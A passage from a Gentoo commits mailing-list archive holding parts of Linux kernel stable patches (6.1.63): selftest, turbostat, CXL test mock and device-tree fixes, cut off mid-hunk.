+ 
+-	pm_runtime_put_sync(mcbsp->dev);
++	if (mcbsp->active)
++		pm_runtime_put_sync(mcbsp->dev);
+ 
+ 	r = clk_set_parent(mcbsp->fclk, fck_src);
+ 	if (r)
+ 		dev_err(mcbsp->dev, "CLKS: could not clk_set_parent() to %s\n",
+ 			src);
+ 
+-	pm_runtime_get_sync(mcbsp->dev);
++	if (mcbsp->active)
++		pm_runtime_get_sync(mcbsp->dev);
+ 
+ 	clk_put(fck_src);
+ 
+diff --git a/tools/perf/util/intel-pt.c b/tools/perf/util/intel-pt.c
+index d1338a4071268..6fb64c58b408b 100644
+--- a/tools/perf/util/intel-pt.c
++++ b/tools/perf/util/intel-pt.c
+@@ -1483,9 +1483,11 @@ static void intel_pt_sample_flags(struct intel_pt_queue *ptq)
+ 	} else if (ptq->state->flags & INTEL_PT_ASYNC) {
+ 		if (!ptq->state->to_ip)
+ 			ptq->flags = PERF_IP_FLAG_BRANCH |
++				     PERF_IP_FLAG_ASYNC |
+ 				     PERF_IP_FLAG_TRACE_END;
+ 		else if (ptq->state->from_nr && !ptq->state->to_nr)
+ 			ptq->flags = PERF_IP_FLAG_BRANCH | PERF_IP_FLAG_CALL |
++				     PERF_IP_FLAG_ASYNC |
+ 				     PERF_IP_FLAG_VMEXIT;
+ 		else
+ 			ptq->flags = PERF_IP_FLAG_BRANCH | PERF_IP_FLAG_CALL |
+diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c
+index c61c6c704fbe6..b113900d94879 100644
+--- a/tools/power/x86/turbostat/turbostat.c
++++ b/tools/power/x86/turbostat/turbostat.c
+@@ -2180,7 +2180,7 @@ retry:
+ 	if ((DO_BIC(BIC_CPU_c6) || soft_c1_residency_display(BIC_CPU_c6)) && !do_knl_cstates) {
+ 		if (get_msr(cpu, MSR_CORE_C6_RESIDENCY, &c->c6))
+ 			return -7;
+-	} else if (do_knl_cstates || soft_c1_residency_display(BIC_CPU_c6)) {
++	} else if (do_knl_cstates && soft_c1_residency_display(BIC_CPU_c6)) {
+ 		if (get_msr(cpu, MSR_KNL_CORE_C6_RESIDENCY, &c->c6))
+ 			return -7;
+ 	}
+@@ -5790,6 +5790,7 @@ void process_cpuid()
+ 	rapl_probe(family, model);
+ 	perf_limit_reasons_probe(family, model);
+ 	automatic_cstate_conversion_probe(family, model);
++	prewake_cstate_probe(family, model);
+ 
+ 	check_tcc_offset(model_orig);
+ 
+diff --git a/tools/testing/cxl/test/cxl.c b/tools/testing/cxl/test/cxl.c
+index 7edce12fd2ce5..339b31a3319bf 100644
+--- a/tools/testing/cxl/test/cxl.c
++++ b/tools/testing/cxl/test/cxl.c
+@@ -551,6 +551,142 @@ static int mock_decoder_reset(struct cxl_decoder *cxld)
+ 	return 0;
+ }
+ 
++static void default_mock_decoder(struct cxl_decoder *cxld)
++{
++	cxld->hpa_range = (struct range){
++		.start = 0,
++		.end = -1,
++	};
++
++	cxld->interleave_ways = 1;
++	cxld->interleave_granularity = 256;
++	cxld->target_type = CXL_DECODER_EXPANDER;
++	cxld->commit = mock_decoder_commit;
++	cxld->reset = mock_decoder_reset;
++}
++
++static int first_decoder(struct device *dev, void *data)
++{
++	struct cxl_decoder *cxld;
++
++	if (!is_switch_decoder(dev))
++		return 0;
++	cxld = to_cxl_decoder(dev);
++	if (cxld->id == 0)
++		return 1;
++	return 0;
++}
++
++static void mock_init_hdm_decoder(struct cxl_decoder *cxld)
++{
++	struct acpi_cedt_cfmws *window = mock_cfmws[0];
++	struct platform_device *pdev = NULL;
++	struct cxl_endpoint_decoder *cxled;
++	struct cxl_switch_decoder *cxlsd;
++	struct cxl_port *port, *iter;
++	const int size = SZ_512M;
++	struct cxl_memdev *cxlmd;
++	struct cxl_dport *dport;
++	struct device *dev;
++	bool hb0 = false;
++	u64 base;
++	int i;
++
++	if (is_endpoint_decoder(&cxld->dev)) {
++		cxled = to_cxl_endpoint_decoder(&cxld->dev);
++		cxlmd = cxled_to_memdev(cxled);
++		WARN_ON(!dev_is_platform(cxlmd->dev.parent));
++		pdev = to_platform_device(cxlmd->dev.parent);
++
++		/* check is endpoint is attach to host-bridge0 */
++		port = cxled_to_port(cxled);
++		do {
++			if (port->uport == &cxl_host_bridge[0]->dev) {
++				hb0 = true;
++				break;
++			}
++			if (is_cxl_port(port->dev.parent))
++				port = to_cxl_port(port->dev.parent);
++			else
++				port = NULL;
++		} while (port);
++		port = cxled_to_port(cxled);
++	}
++
++	/*
++	 * The first decoder on the first 2 devices on the first switch
++	 * attached to host-bridge0 mock a fake / static RAM region. All
++	 * other decoders are default disabled. Given the round robin
++	 * assignment those devices are named cxl_mem.0, and cxl_mem.4.
++	 *
++	 * See 'cxl list -BMPu -m cxl_mem.0,cxl_mem.4'
++	 */
++	if (!hb0 || pdev->id % 4 || pdev->id > 4 || cxld->id > 0) {
++		default_mock_decoder(cxld);
++		return;
++	}
++
++	base = window->base_hpa;
++	cxld->hpa_range = (struct range) {
++		.start = base,
++		.end = base + size - 1,
++	};
++
++	cxld->interleave_ways = 2;
++	eig_to_granularity(window->granularity, &cxld->interleave_granularity);
++	cxld->target_type = CXL_DECODER_EXPANDER;
++	cxld->flags = CXL_DECODER_F_ENABLE;
++	cxled->state = CXL_DECODER_STATE_AUTO;
++	port->commit_end = cxld->id;
++	devm_cxl_dpa_reserve(cxled, 0, size / cxld->interleave_ways, 0);
++	cxld->commit = mock_decoder_commit;
++	cxld->reset = mock_decoder_reset;
++
++	/*
++	 * Now that endpoint decoder is set up, walk up the hierarchy
++	 * and setup the switch and root port decoders targeting @cxlmd.
++	 */
++	iter = port;
++	for (i = 0; i < 2; i++) {
++		dport = iter->parent_dport;
++		iter = dport->port;
++		dev = device_find_child(&iter->dev, NULL, first_decoder);
++		/*
++		 * Ancestor ports are guaranteed to be enumerated before
++		 * @port, and all ports have at least one decoder.
++		 */
++		if (WARN_ON(!dev))
++			continue;
++		cxlsd = to_cxl_switch_decoder(dev);
++		if (i == 0) {
++			/* put cxl_mem.4 second in the decode order */
++			if (pdev->id == 4)
++				cxlsd->target[1] = dport;
++			else
++				cxlsd->target[0] = dport;
++		} else
++			cxlsd->target[0] = dport;
++		cxld = &cxlsd->cxld;
++		cxld->target_type = CXL_DECODER_EXPANDER;
++		cxld->flags = CXL_DECODER_F_ENABLE;
++		iter->commit_end = 0;
++		/*
++		 * Switch targets 2 endpoints, while host bridge targets
++		 * one root port
++		 */
++		if (i == 0)
++			cxld->interleave_ways = 2;
++		else
++			cxld->interleave_ways = 1;
++		cxld->interleave_granularity = 4096;
++		cxld->hpa_range = (struct range) {
++			.start = base,
++			.end = base + size - 1,
++		};
++		put_device(dev);
++	}
++}
++
+ static int mock_cxl_enumerate_decoders(struct cxl_hdm *cxlhdm)
+ {
+ 	struct cxl_port *port = cxlhdm->port;
+@@ -596,16 +732,7 @@ static int mock_cxl_enumerate_decoders(struct cxl_hdm *cxlhdm)
+ 			cxld = &cxled->cxld;
+ 		}
+ 
+-		cxld->hpa_range = (struct range) {
+-			.start = 0,
+-			.end = -1,
+-		};
+-
+-		cxld->interleave_ways = min_not_zero(target_count, 1);
+-		cxld->interleave_granularity = SZ_4K;
+-		cxld->target_type = CXL_DECODER_EXPANDER;
+-		cxld->commit = mock_decoder_commit;
+-		cxld->reset = mock_decoder_reset;
++		mock_init_hdm_decoder(cxld);
+ 
+ 		if (target_count) {
+ 			rc = device_for_each_child(port->uport, &ctx,
+diff --git a/tools/testing/selftests/efivarfs/create-read.c b/tools/testing/selftests/efivarfs/create-read.c
+index 9674a19396a32..7bc7af4eb2c17 100644
+--- a/tools/testing/selftests/efivarfs/create-read.c
++++ b/tools/testing/selftests/efivarfs/create-read.c
+@@ -32,8 +32,10 @@ int main(int argc, char **argv)
+ 	rc = read(fd, buf, sizeof(buf));
+ 	if (rc != 0) {
+ 		fprintf(stderr, "Reading a new var should return EOF\n");
++		close(fd);
+ 		return EXIT_FAILURE;
+ 	}
+ 
++	close(fd);
+ 	return EXIT_SUCCESS;
+ }
+diff --git a/tools/testing/selftests/lkdtm/config b/tools/testing/selftests/lkdtm/config
+index 5d52f64dfb430..7afe05e8c4d79 100644
+--- a/tools/testing/selftests/lkdtm/config
++++ b/tools/testing/selftests/lkdtm/config
+@@ -9,7 +9,6 @@ CONFIG_INIT_ON_FREE_DEFAULT_ON=y
+ CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y
+ CONFIG_UBSAN=y
+ CONFIG_UBSAN_BOUNDS=y
+-CONFIG_UBSAN_TRAP=y
+ CONFIG_STACKPROTECTOR_STRONG=y
+ CONFIG_SLUB_DEBUG=y
+ CONFIG_SLUB_DEBUG_ON=y
+diff --git a/tools/testing/selftests/lkdtm/tests.txt b/tools/testing/selftests/lkdtm/tests.txt
+index 607b8d7e3ea34..2f3a1b96da6e3 100644
+--- a/tools/testing/selftests/lkdtm/tests.txt
++++ b/tools/testing/selftests/lkdtm/tests.txt
+@@ -7,7 +7,7 @@ EXCEPTION
+ #EXHAUST_STACK Corrupts memory on failure
+ #CORRUPT_STACK Crashes entire system on success
+ #CORRUPT_STACK_STRONG Crashes entire system on success
+-ARRAY_BOUNDS
++ARRAY_BOUNDS call trace:|UBSAN: array-index-out-of-bounds
+ CORRUPT_LIST_ADD list_add corruption
+ CORRUPT_LIST_DEL list_del corruption
+ STACK_GUARD_PAGE_LEADING
+diff --git a/tools/testing/selftests/resctrl/Makefile b/tools/testing/selftests/resctrl/Makefile
+index 5073dbc961258..2deac2031de9e 100644
+--- a/tools/testing/selftests/resctrl/Makefile
++++ b/tools/testing/selftests/resctrl/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS = -g -Wall -O2 -D_FORTIFY_SOURCE=2
++CFLAGS = -g -Wall -O2 -D_FORTIFY_SOURCE=2 -D_GNU_SOURCE
+ CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := resctrl_tests
+diff --git a/tools/testing/selftests/resctrl/cmt_test.c b/tools/testing/selftests/resctrl/cmt_test.c
+index 3b0454e7fc826..dd9f9db70af46 100644
+--- a/tools/testing/selftests/resctrl/cmt_test.c
++++ b/tools/testing/selftests/resctrl/cmt_test.c
+@@ -91,9 +91,6 @@ int cmt_resctrl_val(int cpu_no, int n, char **benchmark_cmd)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (!validate_resctrl_feature_request(CMT_STR))
+-		return -1;
+-
+ 	ret = get_cbm_mask("L3", cbm_mask);
+ 	if (ret)
+ 		return ret;
+diff --git a/tools/testing/selftests/resctrl/mba_test.c b/tools/testing/selftests/resctrl/mba_test.c
+index 97dc98c0c9497..ff8b588b63ed7 100644
+--- a/tools/testing/selftests/resctrl/mba_test.c
++++ b/tools/testing/selftests/resctrl/mba_test.c
+@@ -12,7 +12,7 @@
+ 
+ #define RESULT_FILE_NAME	"result_mba"
+ #define NUM_OF_RUNS		5
+-#define MAX_DIFF_PERCENT	5
++#define MAX_DIFF_PERCENT	8
+ #define ALLOCATION_MAX		100
+ #define ALLOCATION_MIN		10
+ #define ALLOCATION_STEP		10
+diff --git a/tools/testing/selftests/resctrl/mbm_test.c b/tools/testing/selftests/resctrl/mbm_test.c
+index 280187628054d..5dc1dce89733a 100644
+--- a/tools/testing/selftests/resctrl/mbm_test.c
++++ b/tools/testing/selftests/resctrl/mbm_test.c
+@@ -11,7 +11,7 @@
+ #include "resctrl.h"
+ 
+ #define RESULT_FILE_NAME	"result_mbm"
+-#define MAX_DIFF_PERCENT	5
++#define MAX_DIFF_PERCENT	8
+ #define NUM_OF_RUNS		5
+ 
+ static int
+diff --git a/tools/testing/selftests/resctrl/resctrl.h b/tools/testing/selftests/resctrl/resctrl.h
+index dbe5cfb545585..4597bba66ad45 100644
+--- a/tools/testing/selftests/resctrl/resctrl.h
++++ b/tools/testing/selftests/resctrl/resctrl.h
+@@ -1,5 +1,4 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+-#define _GNU_SOURCE
+ #ifndef RESCTRL_H
+ #define RESCTRL_H
+ #include <stdio.h>


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-11-20 11:23 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-11-20 11:23 UTC (permalink / raw
  To: gentoo-commits

commit:     34b054e030b4d77909f23813b69a0cb891c5e2fe
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Nov 20 11:22:41 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Nov 20 11:22:41 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=34b054e0

Linux patch 6.1.63

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1062_linux-6.1.63.patch | 22957 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 22961 insertions(+)

diff --git a/0000_README b/0000_README
index 3a96d6b9..56731b47 100644
--- a/0000_README
+++ b/0000_README
@@ -291,6 +291,10 @@ Patch:  1061_linux-6.1.62.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.62
 
+Patch:  1062_linux-6.1.63.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.63
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1062_linux-6.1.63.patch b/1062_linux-6.1.63.patch
new file mode 100644
index 00000000..00337f2f
--- /dev/null
+++ b/1062_linux-6.1.63.patch
@@ -0,0 +1,22957 @@
+diff --git a/Documentation/devicetree/bindings/mfd/mt6397.txt b/Documentation/devicetree/bindings/mfd/mt6397.txt
+index 0088442efca1a..8f9784af92d6e 100644
+--- a/Documentation/devicetree/bindings/mfd/mt6397.txt
++++ b/Documentation/devicetree/bindings/mfd/mt6397.txt
+@@ -21,8 +21,10 @@ Required properties:
+ compatible:
+ 	"mediatek,mt6323" for PMIC MT6323
+ 	"mediatek,mt6331" for PMIC MT6331 and MT6332
+-	"mediatek,mt6358" for PMIC MT6358 and MT6366
++	"mediatek,mt6357" for PMIC MT6357
++	"mediatek,mt6358" for PMIC MT6358
+ 	"mediatek,mt6359" for PMIC MT6359
++	"mediatek,mt6366", "mediatek,mt6358" for PMIC MT6366
+ 	"mediatek,mt6397" for PMIC MT6397
+ 
+ Optional subnodes:
+@@ -39,6 +41,7 @@ Optional subnodes:
+ 		- compatible: "mediatek,mt6323-regulator"
+ 	see ../regulator/mt6323-regulator.txt
+ 		- compatible: "mediatek,mt6358-regulator"
++		- compatible: "mediatek,mt6366-regulator", "mediatek-mt6358-regulator"
+ 	see ../regulator/mt6358-regulator.txt
+ 		- compatible: "mediatek,mt6397-regulator"
+ 	see ../regulator/mt6397-regulator.txt
+diff --git a/Documentation/virt/coco/sev-guest.rst b/Documentation/virt/coco/sev-guest.rst
+index bf593e88cfd9d..68b0d2363af82 100644
+--- a/Documentation/virt/coco/sev-guest.rst
++++ b/Documentation/virt/coco/sev-guest.rst
+@@ -37,11 +37,11 @@ along with a description:
+       the return value.  General error numbers (-ENOMEM, -EINVAL)
+       are not detailed, but errors with specific meanings are.
+ 
+-The guest ioctl should be issued on a file descriptor of the /dev/sev-guest device.
+-The ioctl accepts struct snp_user_guest_request. The input and output structure is
+-specified through the req_data and resp_data field respectively. If the ioctl fails
+-to execute due to a firmware error, then fw_err code will be set otherwise the
+-fw_err will be set to 0x00000000000000ff.
++The guest ioctl should be issued on a file descriptor of the /dev/sev-guest
++device.  The ioctl accepts struct snp_user_guest_request. The input and
++output structure is specified through the req_data and resp_data field
++respectively. If the ioctl fails to execute due to a firmware error, then
++the fw_error code will be set, otherwise fw_error will be set to -1.
+ 
+ The firmware checks that the message sequence counter is one greater than
+ the guests message sequence counter. If guest driver fails to increment message
+@@ -57,8 +57,14 @@ counter (e.g. counter overflow), then -EIO will be returned.
+                 __u64 req_data;
+                 __u64 resp_data;
+ 
+-                /* firmware error code on failure (see psp-sev.h) */
+-                __u64 fw_err;
++                /* bits[63:32]: VMM error code, bits[31:0] firmware error code (see psp-sev.h) */
++                union {
++                        __u64 exitinfo2;
++                        struct {
++                                __u32 fw_error;
++                                __u32 vmm_error;
++                        };
++                };
+         };
+ 
+ 2.1 SNP_GET_REPORT
+diff --git a/Makefile b/Makefile
+index 2e7bc3cc1c177..7c69293b7e059 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 62
++SUBLEVEL = 63
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/am3517-evm.dts b/arch/arm/boot/dts/am3517-evm.dts
+index 7bab0a9dadb30..95508b7fa3bf6 100644
+--- a/arch/arm/boot/dts/am3517-evm.dts
++++ b/arch/arm/boot/dts/am3517-evm.dts
+@@ -271,13 +271,6 @@
+ 		>;
+ 	};
+ 
+-	leds_pins: pinmux_leds_pins {
+-		pinctrl-single,pins = <
+-			OMAP3_WKUP_IOPAD(0x2a24, PIN_OUTPUT_PULLUP | MUX_MODE4)	/* jtag_emu0.gpio_11 */
+-			OMAP3_WKUP_IOPAD(0x2a26, PIN_OUTPUT_PULLUP | MUX_MODE4)	/* jtag_emu1.gpio_31 */
+-		>;
+-	};
+-
+ 	mmc1_pins: pinmux_mmc1_pins {
+ 		pinctrl-single,pins = <
+ 			OMAP3_CORE1_IOPAD(0x2144, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc1_clk.sdmmc1_clk */
+@@ -355,3 +348,12 @@
+ 		>;
+ 	};
+ };
++
++&omap3_pmx_wkup {
++	leds_pins: pinmux_leds_pins {
++		pinctrl-single,pins = <
++			OMAP3_WKUP_IOPAD(0x2a24, PIN_OUTPUT_PULLUP | MUX_MODE4)	/* jtag_emu0.gpio_11 */
++			OMAP3_WKUP_IOPAD(0x2a26, PIN_OUTPUT_PULLUP | MUX_MODE4)	/* jtag_emu1.gpio_31 */
++		>;
++	};
++};
+diff --git a/arch/arm/boot/dts/qcom-mdm9615.dtsi b/arch/arm/boot/dts/qcom-mdm9615.dtsi
+index b47c86412de2c..17a1a06dfb3f1 100644
+--- a/arch/arm/boot/dts/qcom-mdm9615.dtsi
++++ b/arch/arm/boot/dts/qcom-mdm9615.dtsi
+@@ -82,14 +82,12 @@
+ 		};
+ 	};
+ 
+-	regulators {
+-		vsdcc_fixed: vsdcc-regulator {
+-			compatible = "regulator-fixed";
+-			regulator-name = "SDCC Power";
+-			regulator-min-microvolt = <2700000>;
+-			regulator-max-microvolt = <2700000>;
+-			regulator-always-on;
+-		};
++	vsdcc_fixed: vsdcc-regulator {
++		compatible = "regulator-fixed";
++		regulator-name = "SDCC Power";
++		regulator-min-microvolt = <2700000>;
++		regulator-max-microvolt = <2700000>;
++		regulator-always-on;
+ 	};
+ 
+ 	soc: soc {
+diff --git a/arch/arm/boot/dts/r8a7792-blanche.dts b/arch/arm/boot/dts/r8a7792-blanche.dts
+index c66de9dd12dfc..6a83923aa4612 100644
+--- a/arch/arm/boot/dts/r8a7792-blanche.dts
++++ b/arch/arm/boot/dts/r8a7792-blanche.dts
+@@ -239,7 +239,7 @@
+ 	};
+ 
+ 	keyboard_pins: keyboard {
+-		pins = "GP_3_10", "GP_3_11", "GP_3_12", "GP_3_15", "GP_11_02";
++		pins = "GP_3_10", "GP_3_11", "GP_3_12", "GP_3_15", "GP_11_2";
+ 		bias-pull-up;
+ 	};
+ 
+diff --git a/arch/arm/lib/memset.S b/arch/arm/lib/memset.S
+index d71ab61430b26..de75ae4d5ab41 100644
+--- a/arch/arm/lib/memset.S
++++ b/arch/arm/lib/memset.S
+@@ -17,6 +17,7 @@ ENTRY(__memset)
+ ENTRY(mmioset)
+ WEAK(memset)
+ UNWIND( .fnstart         )
++	and	r1, r1, #255		@ cast to unsigned char
+ 	ands	r3, r0, #3		@ 1 unaligned?
+ 	mov	ip, r0			@ preserve r0 as return value
+ 	bne	6f			@ 1
+diff --git a/arch/arm/xen/enlighten.c b/arch/arm/xen/enlighten.c
+index 93c8ccbf29828..b647306eb1608 100644
+--- a/arch/arm/xen/enlighten.c
++++ b/arch/arm/xen/enlighten.c
+@@ -164,9 +164,6 @@ static int xen_starting_cpu(unsigned int cpu)
+ 	BUG_ON(err);
+ 	per_cpu(xen_vcpu, cpu) = vcpup;
+ 
+-	if (!xen_kernel_unmapped_at_usr())
+-		xen_setup_runstate_info(cpu);
+-
+ after_register_vcpu_info:
+ 	enable_percpu_irq(xen_events_irq, 0);
+ 	return 0;
+@@ -523,9 +520,6 @@ static int __init xen_guest_init(void)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (!xen_kernel_unmapped_at_usr())
+-		xen_time_setup_guest();
+-
+ 	if (xen_initial_domain())
+ 		pvclock_gtod_register_notifier(&xen_pvclock_gtod_notifier);
+ 
+@@ -535,7 +529,13 @@ static int __init xen_guest_init(void)
+ }
+ early_initcall(xen_guest_init);
+ 
+-static int __init xen_pm_init(void)
++static int xen_starting_runstate_cpu(unsigned int cpu)
++{
++	xen_setup_runstate_info(cpu);
++	return 0;
++}
++
++static int __init xen_late_init(void)
+ {
+ 	if (!xen_domain())
+ 		return -ENODEV;
+@@ -548,9 +548,16 @@ static int __init xen_pm_init(void)
+ 		do_settimeofday64(&ts);
+ 	}
+ 
+-	return 0;
++	if (xen_kernel_unmapped_at_usr())
++		return 0;
++
++	xen_time_setup_guest();
++
++	return cpuhp_setup_state(CPUHP_AP_ARM_XEN_RUNSTATE_STARTING,
++				 "arm/xen_runstate:starting",
++				 xen_starting_runstate_cpu, NULL);
+ }
+-late_initcall(xen_pm_init);
++late_initcall(xen_late_init);
+ 
+ 
+ /* empty stubs */
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm.dtsi b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+index 12c82bb1bb7aa..d583db18f74cc 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+@@ -398,6 +398,7 @@
+ 						      "pll8k", "pll11k", "clkext3";
+ 					dmas = <&sdma2 24 25 0x80000000>;
+ 					dma-names = "rx";
++					#sound-dai-cells = <0>;
+ 					status = "disabled";
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn.dtsi b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+index 37246ca9d9075..66fadbf19f0a3 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+@@ -370,6 +370,7 @@
+ 						      "pll8k", "pll11k", "clkext3";
+ 					dmas = <&sdma2 24 25 0x80000000>;
+ 					dma-names = "rx";
++					#sound-dai-cells = <0>;
+ 					status = "disabled";
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8qm-ss-img.dtsi b/arch/arm64/boot/dts/freescale/imx8qm-ss-img.dtsi
+index 7764b4146e0ab..2bbdacb1313f9 100644
+--- a/arch/arm64/boot/dts/freescale/imx8qm-ss-img.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8qm-ss-img.dtsi
+@@ -8,5 +8,5 @@
+ };
+ 
+ &jpegenc {
+-	compatible = "nxp,imx8qm-jpgdec", "nxp,imx8qxp-jpgenc";
++	compatible = "nxp,imx8qm-jpgenc", "nxp,imx8qxp-jpgenc";
+ };
+diff --git a/arch/arm64/boot/dts/marvell/cn9130-crb.dtsi b/arch/arm64/boot/dts/marvell/cn9130-crb.dtsi
+index 8e4ec243fb8fc..e5fc6cca50e74 100644
+--- a/arch/arm64/boot/dts/marvell/cn9130-crb.dtsi
++++ b/arch/arm64/boot/dts/marvell/cn9130-crb.dtsi
+@@ -120,7 +120,7 @@
+ 				       "mpp59", "mpp60", "mpp61";
+ 			marvell,function = "sdio";
+ 		};
+-		cp0_spi0_pins: cp0-spi-pins-0 {
++		cp0_spi1_pins: cp0-spi-pins-1 {
+ 			marvell,pins = "mpp13", "mpp14", "mpp15", "mpp16";
+ 			marvell,function = "spi1";
+ 		};
+@@ -170,7 +170,7 @@
+ 
+ &cp0_spi1 {
+ 	pinctrl-names = "default";
+-	pinctrl-0 = <&cp0_spi0_pins>;
++	pinctrl-0 = <&cp0_spi1_pins>;
+ 	reg = <0x700680 0x50>,		/* control */
+ 	      <0x2000000 0x1000000>;	/* CS0 */
+ 	status = "okay";
+diff --git a/arch/arm64/boot/dts/marvell/cn9130-db.dtsi b/arch/arm64/boot/dts/marvell/cn9130-db.dtsi
+index c7de1ea0d470a..6eb6a175de38d 100644
+--- a/arch/arm64/boot/dts/marvell/cn9130-db.dtsi
++++ b/arch/arm64/boot/dts/marvell/cn9130-db.dtsi
+@@ -307,7 +307,7 @@
+ &cp0_spi1 {
+ 	status = "disabled";
+ 	pinctrl-names = "default";
+-	pinctrl-0 = <&cp0_spi0_pins>;
++	pinctrl-0 = <&cp0_spi1_pins>;
+ 	reg = <0x700680 0x50>;
+ 
+ 	flash@0 {
+@@ -371,7 +371,7 @@
+ 				       "mpp59", "mpp60", "mpp61";
+ 			marvell,function = "sdio";
+ 		};
+-		cp0_spi0_pins: cp0-spi-pins-0 {
++		cp0_spi1_pins: cp0-spi-pins-1 {
+ 			marvell,pins = "mpp13", "mpp14", "mpp15", "mpp16";
+ 			marvell,function = "spi1";
+ 		};
+diff --git a/arch/arm64/boot/dts/nvidia/tegra234.dtsi b/arch/arm64/boot/dts/nvidia/tegra234.dtsi
+index dfe2cf2f4b218..6598e9ac52b81 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra234.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra234.dtsi
+@@ -532,12 +532,12 @@
+ 				     <GIC_SPI 7 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 8 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 9 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 10 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 11 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 12 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 13 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 14 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 15 IRQ_TYPE_LEVEL_HIGH>;
++				     <GIC_SPI 256 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 257 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 258 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 259 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 260 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 261 IRQ_TYPE_LEVEL_HIGH>;
+ 			status = "okay";
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+index 9650ae70c8723..9d116e1fbe10c 100644
+--- a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
++++ b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+@@ -200,6 +200,9 @@
+ 		pd-gpios = <&msmgpio 32 GPIO_ACTIVE_HIGH>;
+ 
+ 		avdd-supply = <&pm8916_l6>;
++		a2vdd-supply = <&pm8916_l6>;
++		dvdd-supply = <&pm8916_l6>;
++		pvdd-supply = <&pm8916_l6>;
+ 		v1p2-supply = <&pm8916_l6>;
+ 		v3p3-supply = <&pm8916_l17>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8916.dtsi b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+index f84b3c1a03c53..bafac2cf7e3d6 100644
+--- a/arch/arm64/boot/dts/qcom/msm8916.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+@@ -1257,7 +1257,7 @@
+ 			#size-cells = <1>;
+ 			#iommu-cells = <1>;
+ 			compatible = "qcom,msm8916-iommu", "qcom,msm-iommu-v1";
+-			ranges = <0 0x01e20000 0x40000>;
++			ranges = <0 0x01e20000 0x20000>;
+ 			reg = <0x01ef0000 0x3000>;
+ 			clocks = <&gcc GCC_SMMU_CFG_CLK>,
+ 				 <&gcc GCC_APSS_TCU_CLK>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts b/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts
+index 3ab0ad14e8704..95eab1f379229 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts
++++ b/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts
+@@ -109,11 +109,6 @@
+ 			qcom,client-id = <1>;
+ 		};
+ 
+-		audio_mem: audio@cb400000 {
+-			reg = <0 0xcb000000 0 0x400000>;
+-			no-mem;
+-		};
+-
+ 		qseecom_mem: qseecom@cb400000 {
+ 			reg = <0 0xcb400000 0 0x1c00000>;
+ 			no-mem;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 0cdc579f26de7..aea356c63b9a3 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -820,7 +820,8 @@
+ 			clocks = <&rpmhcc RPMH_CXO_CLK>,
